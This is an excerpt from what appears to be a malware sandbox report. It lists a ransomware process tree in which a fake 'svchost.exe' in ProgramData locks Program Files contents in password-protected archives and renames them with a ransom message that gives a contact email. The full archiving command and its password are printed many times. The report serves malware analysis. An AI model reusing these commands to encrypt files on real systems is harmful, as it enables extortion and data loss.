  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ka.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ka.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:6044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\kaa.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\kaa.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\kab.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\kab.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:5500
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\kk.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\kk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:5184
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ko.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ko.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:4452
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ku-ckb.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ku-ckb.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:4684
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ku.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ku.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2104
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ky.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ky.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\lij.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\lij.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:4976
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\lt.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\lt.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:4896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\lv.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\lv.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:5632
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mk.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:3328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mn.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mn.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:3348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mng.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mng.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mng2.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mng2.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:5268
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mr.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mr.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6004
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ms.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ms.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5276
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\nb.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\nb.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1004
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ne.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ne.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4304
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\nl.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\nl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5588
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\nn.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\nn.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3132
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\pa-in.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\pa-in.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2904
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\pl.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\pl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3428
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ps.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ps.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4776
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\pt-br.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\pt-br.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\pt.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\pt.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5036
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ro.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ro.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ru.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ru.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4048
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sa.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sa.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5904
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\si.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\si.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5140
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sk.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sl.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4104
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sq.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sq.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sr-spc.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sr-spc.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sr-spl.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sr-spl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sv.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sv.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sw.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sw.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ta.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ta.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3456
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\tg.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\tg.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5664
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\th.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\th.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\tk.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\tk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5412
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\tr.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\tr.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\tt.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\tt.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1612
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ug.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ug.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4332
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\uk.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\uk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1320
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\uz-cyrl.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\uz-cyrl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2476
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\uz.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\uz.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5320
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\va.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\va.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5740
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\vi.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\vi.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3636
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\yo.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\yo.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\zh-cn.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\zh-cn.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5096
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\zh-tw.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\zh-tw.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4848
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\License.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\License.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\readme.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\readme.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3604
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\ConfirmConnect.jpeg(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\ConfirmConnect.jpeg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Crashpad\settings.dat(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Crashpad\settings.dat" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4168
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\DenyProtect.jtx(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\DenyProtect.jtx" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3944
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\dotnet\LICENSE.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\dotnet\LICENSE.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\dotnet\ThirdPartyNotices.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\dotnet\ThirdPartyNotices.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\javafx-src.zip(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\javafx-src.zip" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:5084
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\jmc.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\jmc.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1440
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\jre\bin\server\Xusage.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\jre\bin\server\Xusage.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5424
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1092
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\jre\lib\jvm.hprof.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\jre\lib\jvm.hprof.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1776
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\jre\lib\security\public_suffix_list.dat(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\jre\lib\security\public_suffix_list.dat" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:3916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\jre\lib\tzdb.dat(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\jre\lib\tzdb.dat" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4040
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\jre\README.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\jre\README.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1908
- C:\ProgramData\msvkp\svchost.exe
